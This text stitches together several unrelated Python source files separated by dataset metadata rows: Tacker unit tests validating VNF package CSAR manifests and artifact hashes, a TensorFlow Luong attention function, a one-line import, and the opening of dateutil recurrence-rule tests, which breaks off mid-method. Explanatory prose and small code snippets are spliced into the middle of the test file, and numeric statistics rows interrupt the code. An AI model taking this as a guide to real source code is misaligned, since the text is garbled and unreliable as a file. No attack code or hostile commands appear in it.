    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_single_meta_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_meta')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])
        self.assertIsNotNone(vnf_artifacts)
        self.assertIsNotNone(vnf_artifacts[0]['Source'])
        self.assertIsNotNone(vnf_artifacts[0]['Hash'])

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_meta_in_manifest_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_meta_in_manifest')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])
        self.assertIsNotNone(vnf_artifacts)
        self.assertIsNotNone(vnf_artifacts[0]['Source'])
        self.assertIsNotNone(vnf_artifacts[0]['Hash'])

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_false_mf_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest_false')
        self.addCleanup(os.remove, file_path)
        manifest_path = 'manifest.mf1'
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        msg = (('The file "%(manifest)s" in the CSAR "%(csar)s" does not '
                'contain valid manifest.') %
               {'manifest': manifest_path, 'csar': file_path})
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_false_mf_name_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_single_manifest_false_name')
        self.addCleanup(os.remove, file_path)
        manifest_path = 'VNF1.mf'
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        msg = (('The filename "%(manifest)s" is an invalid name.'
                'The name must be the same as the main template '
                'file name.') %
               {'manifest': manifest_path, 'csar': file_path})
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_false_hash_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest_false_hash')
        self.addCleanup(os.remove, file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        hash_code = '27bbdb25d8f4ed6d07d6f6581b86515e8b2f' \
                    '0059b236ef7b6f50d6674b34f02'
        artifact_path = 'Scripts/install.sh'
        msg = (('The hash "%(hash)s" of artifact file '
                '"%(artifact)s" is an invalid value.') %
               {'hash': hash_code, 'artifact': artifact_path})
        self.assertEqual(msg, exc.format_message())
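The hash- and algorithm-validation failures exercised above boil down to one check: recompute the artifact's digest and compare it to the manifest entry, rejecting unknown algorithm names. A minimal stdlib sketch of that idea (the `verify_artifact` helper is hypothetical, not Tacker's `csar_utils` implementation):

```python
import hashlib


def verify_artifact(data, expected_hash, algorithm="sha-256"):
    """Recompute the digest of artifact bytes and compare it with the
    manifest value; reject algorithm names hashlib does not know
    (e.g. the "sha-255" case tested above)."""
    name = algorithm.replace("-", "")  # manifest style "sha-256" -> "sha256"
    if name not in hashlib.algorithms_available:
        raise ValueError('invalid algorithm "%s"' % algorithm)
    return hashlib.new(name, data).hexdigest() == expected_hash


# sha-256 digest of b"hello"
ok = verify_artifact(
    b"hello",
    "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824")
```

A wrong digest makes `verify_artifact` return `False`, and an unknown algorithm name raises `ValueError` — the two failure modes the tests above assert on.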
    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_missing_key_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest_missing_key')
        self.addCleanup(os.remove, file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        key_name = sorted(['Algorithm'])
        msg = (('One of the artifact information may not have '
                'the key("%(key)s")') % {'key': key_name})
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_missing_value_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest_missing_value')
        self.addCleanup(os.remove, file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        key_name = 'Algorithm'
        msg = (('One of the artifact information may not have '
                'the key value("%(key)s")') % {'key': key_name})
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_false_source_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest_false_source')
        self.addCleanup(os.remove, file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        artifact_path = 'Scripts/install.s'
        msg = (('The path("%(artifact_path)s") of '
                'artifact Source is an invalid value.') %
               {'artifact_path': artifact_path})
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_false_algorithm_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest_false_algorithm')
        self.addCleanup(os.remove, file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        algorithm = 'sha-255'
        artifact_path = 'Scripts/install.sh'
        msg = (('The algorithm("%(algorithm)s") of '
                'artifact("%(artifact_path)s") is '
                'an invalid value.') %
               {'algorithm': algorithm,
                'artifact_path': artifact_path})
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_without_instantiation_level(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_without_instantiation_level')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        msg = ('Policy of type'
               ' "tosca.policies.nfv.InstantiationLevels is not defined.')
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_invalid_instantiation_level(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_invalid_instantiation_level')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        levels = ['instantiation_level_1', 'instantiation_level_2']
        msg = ("Level(s) instantiation_level_3 not found in "
               "defined levels %s") % ",".join(sorted(levels))
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_invalid_default_instantiation_level(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_with_invalid_default_instantiation_level')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        levels = ['instantiation_level_1', 'instantiation_level_2']
        msg = ("Level instantiation_level_3 not found in "
               "defined levels %s") % ",".join(sorted(levels))
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_without_vnfd_info(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_without_vnfd_info')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        self.assertEqual("VNF properties are mandatory", exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_artifacts_and_without_sw_image_data(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_without_sw_image_data')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        msg = ('Node property "sw_image_data" is missing for '
               'artifact sw_image for node VDU1.')
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_multiple_sw_image_data(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_with_multiple_sw_image_data')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        msg = ('artifacts of type "tosca.artifacts.nfv.SwImage"'
               ' is added more than one time for node VDU1.')
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_csar_with_missing_sw_image_data_in_main_template(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_with_missing_sw_image_data_in_main_template')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        msg = ('Node property "sw_image_data" is missing for'
               ' artifact sw_image for node VDU1.')
        self.assertEqual(msg, exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_without_flavour_info(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir('csar_without_flavour_info')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        self.assertEqual("No VNF flavours are available", exc.format_message())

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_without_flavour_info_in_main_template(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_without_flavour_info_in_main_template')
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, file_path)
        self.assertEqual("No VNF flavours are available",
                         exc.format_message())

    @mock.patch.object(os, 'remove')
    @mock.patch.object(shutil, 'rmtree')
    def test_delete_csar_data(self, mock_rmtree, mock_remove):
        csar_utils.delete_csar_data(constants.UUID)
        mock_rmtree.assert_called()
        mock_remove.assert_called()

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_without_policies(
            self, mock_extract_csar_zip_file):
        file_path = self._get_csar_zip_from_dir(
            'csar_without_policies')
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertIsNone(flavours[0].get('instantiation_levels'))
        self.assertEqual(vnf_data['descriptor_version'], '1.0')

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_with_artifacts_short_notation_without_sw_image_data(
            self, mock_extract_csar_zip_file):
        file_path = "./tacker/tests/etc/samples/etsi/nfv/" \
                    "csar_short_notation_for_artifacts_without_sw_image_data"
        zip_name, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, zip_name)
        msg = ('Node property "sw_image_data" is missing for'
               ' artifact sw_image for node VDU1.')
        self.assertEqual(msg, exc.format_message())
        os.remove(zip_name)

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_artifacts_short_notation(
            self, mock_extract_csar_zip_file):
        file_path = "./tacker/tests/etc/samples/etsi/nfv/" \
                    "csar_with_short_notation_for_artifacts"
        zip_name, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, zip_name)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])
        os.remove(zip_name)

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_multiple_sw_image_data_with_short_notation(
            self, mock_extract_csar_zip_file):
        file_path = "./tacker/tests/etc/samples/etsi/nfv/" \
                    "csar_multiple_sw_image_data_with_short_notation"
        zip_name, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
        exc = self.assertRaises(exceptions.InvalidCSAR,
                                csar_utils.load_csar_data,
                                self.context, constants.UUID, zip_name)
        msg = ('artifacts of type "tosca.artifacts.nfv.SwImage"'
               ' is added more than one time for node VDU1.')
        self.assertEqual(msg, exc.format_message())
        os.remove(zip_name)

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_unit_conversion(
            self, mock_extract_csar_zip_file):
        file_path, _ = utils.create_csar_with_unique_vnfd_id(
            './tacker/tests/etc/samples/etsi/nfv/sample_vnfpkg_tosca_vnfd')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifact = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])
        # 'size', 'min_disk' and 'min_ram' values from sample VNFD will
        # be converted to Bytes
        self.assertEqual(flavours[0]['sw_images'][0]['min_disk'], 1000000000)
        self.assertEqual(flavours[0]['sw_images'][0]['size'], 1879048192)
        self.assertEqual(flavours[0]['sw_images'][1]['min_disk'], 2000000000)
        self.assertEqual(flavours[0]['sw_images'][1]['size'], 2000000000)
        self.assertEqual(flavours[0]['sw_images'][1]['min_ram'], 8590458880)
| 51.130621 | 79 | 0.659561 | 2,949 | 23,878 | 4.96609 | 0.085792 | 0.038785 | 0.051622 | 0.066371 | 0.816661 | 0.808467 | 0.800546 | 0.78648 | 0.769409 | 0.766405 | 0 | 0.009313 | 0.240012 | 23,878 | 466 | 80 | 51.240343 | 0.797708 | 0.032373 | 0 | 0.641463 | 0 | 0 | 0.232122 | 0.148915 | 0 | 0 | 0 | 0 | 0.219512 | 1 | 0.07561 | false | 0 | 0.029268 | 0.002439 | 0.112195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a2637e029636484c193ceed43225e7f352fd298 | 3,094 | py | Python | util/model_luong_attention.py | david-yoon/detecting-incongruity | 2e121fdba0da3a6a0c63df0c46a101a789fe7565 | [
"MIT"
] | 36 | 2018-11-25T21:43:10.000Z | 2022-03-13T10:47:50.000Z | util/model_luong_attention.py | david-yoon/detecting-incongruity | 2e121fdba0da3a6a0c63df0c46a101a789fe7565 | [
"MIT"
] | 1 | 2019-06-16T07:45:47.000Z | 2019-10-14T06:00:29.000Z | util/model_luong_attention.py | david-yoon/detecting-incongruity | 2e121fdba0da3a6a0c63df0c46a101a789fe7565 | [
"MIT"
] | 5 | 2018-12-09T06:40:19.000Z | 2019-10-17T22:07:58.000Z | #-*- coding: utf-8 -*-
import tensorflow as tf
'''
desc : apply luong attention to target vector with given condition
input :
- batch_size :
- target : [batch, seq, embed]
- condition : [batch, embed] --> last hidden
- target_encoder_length : max encoder length
- hidden : should be same btw target and condition, otherwise code should be changed
output :
- attented target : weighted sum [batch, embed]
- norm_dot : attention weight
'''
def luong_attention( batch_size, target, condition, target_encoder_length, hidden_dim ) :
    # same dim [batch, max_seq, embed]
    batch_seq_embed_target = tf.reshape( target, [batch_size, target_encoder_length, hidden_dim] )

    batch_embed_given = condition
    batch_seq_embed_given = tf.reshape( batch_embed_given, [batch_size, hidden_dim, 1] )

    # calculate similarity
    dot = tf.matmul( batch_seq_embed_target, batch_seq_embed_given )

    # pad goes to -inf --> goes "0" after softmax
    pad_position = tf.equal(tf.reshape(dot, [batch_size, target_encoder_length]), 0.0)
    tmp = tf.to_float(pad_position) * -1e9
    tmp = tf.expand_dims(tmp, 2)

    base = tf.ones( [batch_size, target_encoder_length, 1] ) * tmp
    norm_dot = tf.nn.softmax( dot + base, dim=1 )

    # weighted sum by using similarity (normalized)
    target_mul_norm = tf.multiply( batch_seq_embed_target, norm_dot )
    weighted_sum = tf.reduce_sum( target_mul_norm, axis=1 )

    return weighted_sum, norm_dot
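The pad-masking trick above (push padded positions to a large negative value so they come out of the softmax as zero weights) is independent of TensorFlow. A pure-Python sketch of the same idea on a single score vector:

```python
import math


def masked_softmax(scores, mask):
    """Softmax over `scores`, but positions with mask == 0 first get a
    large negative offset (-1e9, as in the TF code above), so their
    final attention weight collapses to (near) zero."""
    shifted = [s + (0.0 if m else -1e9) for s, m in zip(scores, mask)]
    peak = max(shifted)  # subtract the max for numerical stability
    exps = [math.exp(s - peak) for s in shifted]
    total = sum(exps)
    return [e / total for e in exps]


# third position is padding: its weight vanishes, the rest renormalize
weights = masked_softmax([2.0, 1.0, 5.0], mask=[1, 1, 0])
```

Even though the padded position has the highest raw score here, the mask drives its weight to zero and the remaining weights still sum to 1.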
'''
desc : apply luong attention to target vector with given condition
input :
- batch_size :
- target : [batch, seq, embed]
- condition : [batch, embed] --> last hidden
- target_encoder_length : max encoder length
- hidden : should be same btw target and condition, otherwise code should be changed
output :
- attented target : weighted sum [batch, embed]
- norm_dot : attention weight
'''
def luong_attention_new( batch_size, target, condition, batch_seq, max_len, hidden_dim ) :
    # same dim [batch, max_seq, embed]
    batch_seq_embed_target = tf.reshape( target, [batch_size, max_len, hidden_dim] )

    batch_embed_given = condition
    batch_seq_embed_given = tf.reshape( batch_embed_given, [batch_size, hidden_dim, 1] )

    # calculate similarity
    dot = tf.matmul( batch_seq_embed_target, batch_seq_embed_given )
    dot = tf.squeeze(dot)

    # pad goes to -inf --> goes "0" after softmax
    mask = tf.sequence_mask( lengths=batch_seq, maxlen=max_len, dtype=tf.float32 )
    mask_value = -tf.ones_like( mask ) * tf.float32.max
    mask_value = tf.multiply( mask_value, ( 1 - mask ) )
    base = mask_value

    norm_dot = tf.nn.softmax( dot + base, dim=-1 )

    # weighted sum by using similarity (normalized)
    target_mul_norm = tf.multiply( batch_seq_embed_target, tf.expand_dims(norm_dot, -1) )
    weighted_sum = tf.reduce_sum( target_mul_norm, axis=1 )

    return weighted_sum, norm_dot
8a4854ea7dc30866c8aec8da5f94e187d789c58c | 34 | py | Python | src/restfx/session/__init__.py | hyjiacan/restfx | 8ba70bc099e6ace0c9b3afe8909ea61a5ff82dec | [
"MIT",
"BSD-3-Clause"
] | 5 | 2021-01-25T11:09:41.000Z | 2021-04-28T07:17:21.000Z | src/restfx/session/__init__.py | mgbin088/restfx | 86a499a9a4396829e2c40428feb8b2ee13406d52 | [
"MIT",
"BSD-3-Clause"
] | null | null | null | src/restfx/session/__init__.py | mgbin088/restfx | 86a499a9a4396829e2c40428feb8b2ee13406d52 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2021-01-28T00:53:37.000Z | 2021-01-28T00:53:37.000Z | from .session import HttpSession
| 17 | 33 | 0.823529 | 4 | 34 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147059 | 34 | 1 | 34 | 34 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a537119e33b3426368dbd5821dc8fd3b8adda07 | 209,361 | py | Python | dateutil/test/test_rrule.py | NATTURNER777/khbgkjgj | c75e4094a07b98742224008ae09ea40f9b19aa1a | [
"Apache-2.0"
] | null | null | null | dateutil/test/test_rrule.py | NATTURNER777/khbgkjgj | c75e4094a07b98742224008ae09ea40f9b19aa1a | [
"Apache-2.0"
] | null | null | null | dateutil/test/test_rrule.py | NATTURNER777/khbgkjgj | c75e4094a07b98742224008ae09ea40f9b19aa1a | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ._common import WarningTestMixin
from datetime import datetime, date
import unittest
from six import PY3
from dateutil.rrule import (
    rrule, rruleset, rrulestr,
    YEARLY, MONTHLY, WEEKLY, DAILY,
    HOURLY, MINUTELY, SECONDLY,
    MO, TU, WE, TH, FR, SA, SU
)
class RRuleTest(WarningTestMixin, unittest.TestCase):
    def _rrulestr_reverse_test(self, rule):
        """
        Call with an `rrule` and it will test that `str(rrule)` generates a
        string which generates the same `rrule` as the input when passed to
        `rrulestr()`
        """
        rr_str = str(rule)
        rrulestr_rrule = rrulestr(rr_str)
        self.assertEqual(list(rule), list(rrulestr_rrule))
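`_rrulestr_reverse_test` is a serialize-reparse-compare check. The same shape of property can be sketched with a stdlib analogue, using ISO datetime strings in place of RRULE strings (an analogy only, not dateutil code):

```python
from datetime import datetime


def roundtrips(dt):
    # serialize -> parse -> compare equality: the same pattern as
    # str(rule) -> rrulestr(rr_str) -> assertEqual in the helper above
    return datetime.fromisoformat(dt.isoformat()) == dt


ok = roundtrips(datetime(1997, 9, 2, 9, 0))
```

A round-trip test like this catches any field the serializer drops or the parser misreads, without hand-writing the expected string.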
    def testStrAppendRRULEToken(self):
        # `_rrulestr_reverse_test` does not check if the "RRULE:" prefix
        # property is appended properly, so give it a dedicated test
        self.assertEqual(str(rrule(YEARLY,
                                   count=5,
                                   dtstart=datetime(1997, 9, 2, 9, 0))),
                         "DTSTART:19970902T090000\n"
                         "RRULE:FREQ=YEARLY;COUNT=5")

        rr_str = (
            'DTSTART:19970105T083000\nRRULE:FREQ=YEARLY;INTERVAL=2'
        )
        self.assertEqual(str(rrulestr(rr_str)), rr_str)

    def testYearly(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1998, 9, 2, 9, 0),
                          datetime(1999, 9, 2, 9, 0)])

    def testYearlyInterval(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    interval=2,
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1999, 9, 2, 9, 0),
                          datetime(2001, 9, 2, 9, 0)])
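The expected values in the plain yearly cases follow directly from the rule definition: starting at `dtstart`, step the year by `interval`, `count` times. A stdlib-only sketch (the `yearly` helper is hypothetical, not the dateutil implementation, and ignores edge cases such as Feb 29 start dates):

```python
from datetime import datetime


def yearly(dtstart, count, interval=1):
    """Return `count` occurrences spaced `interval` years apart,
    keeping the month/day/time of `dtstart` fixed."""
    return [dtstart.replace(year=dtstart.year + i * interval)
            for i in range(count)]


# mirrors testYearlyInterval: every 2nd year from 1997-09-02 09:00
occurrences = yearly(datetime(1997, 9, 2, 9, 0), count=3, interval=2)
```

The `bymonth`/`byweekday` cases that follow need real calendar arithmetic, which is exactly what `rrule` provides beyond this naive stepping.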
    def testYearlyIntervalLarge(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    interval=100,
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(2097, 9, 2, 9, 0),
                          datetime(2197, 9, 2, 9, 0)])

    def testYearlyByMonth(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    bymonth=(1, 3),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1998, 1, 2, 9, 0),
                          datetime(1998, 3, 2, 9, 0),
                          datetime(1999, 1, 2, 9, 0)])

    def testYearlyByMonthDay(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    bymonthday=(1, 3),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 9, 3, 9, 0),
                          datetime(1997, 10, 1, 9, 0),
                          datetime(1997, 10, 3, 9, 0)])

    def testYearlyByMonthAndMonthDay(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    bymonth=(1, 3),
                                    bymonthday=(5, 7),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1998, 1, 5, 9, 0),
                          datetime(1998, 1, 7, 9, 0),
                          datetime(1998, 3, 5, 9, 0)])

    def testYearlyByWeekDay(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    byweekday=(TU, TH),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 4, 9, 0),
                          datetime(1997, 9, 9, 9, 0)])

    def testYearlyByNWeekDay(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    byweekday=(TU(1), TH(-1)),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 12, 25, 9, 0),
                          datetime(1998, 1, 6, 9, 0),
                          datetime(1998, 12, 31, 9, 0)])

    def testYearlyByNWeekDayLarge(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    byweekday=(TU(3), TH(-3)),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1997, 12, 11, 9, 0),
                          datetime(1998, 1, 20, 9, 0),
                          datetime(1998, 12, 17, 9, 0)])

    def testYearlyByMonthAndWeekDay(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    bymonth=(1, 3),
                                    byweekday=(TU, TH),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1998, 1, 1, 9, 0),
                          datetime(1998, 1, 6, 9, 0),
                          datetime(1998, 1, 8, 9, 0)])

    def testYearlyByMonthAndNWeekDay(self):
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    bymonth=(1, 3),
                                    byweekday=(TU(1), TH(-1)),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1998, 1, 6, 9, 0),
                          datetime(1998, 1, 29, 9, 0),
                          datetime(1998, 3, 3, 9, 0)])

    def testYearlyByMonthAndNWeekDayLarge(self):
        # This is interesting because the TH(-3) ends up before
        # the TU(3).
        self.assertEqual(list(rrule(YEARLY,
                                    count=3,
                                    bymonth=(1, 3),
                                    byweekday=(TU(3), TH(-3)),
                                    dtstart=datetime(1997, 9, 2, 9, 0))),
                         [datetime(1998, 1, 15, 9, 0),
                          datetime(1998, 1, 20, 9, 0),
                          datetime(1998, 3, 12, 9, 0)])

    def testYearlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testYearlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testYearlyByYearDay(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testYearlyByYearDayNeg(self):
self.assertEqual(list(rrule(YEARLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testYearlyByMonthAndYearDay(self):
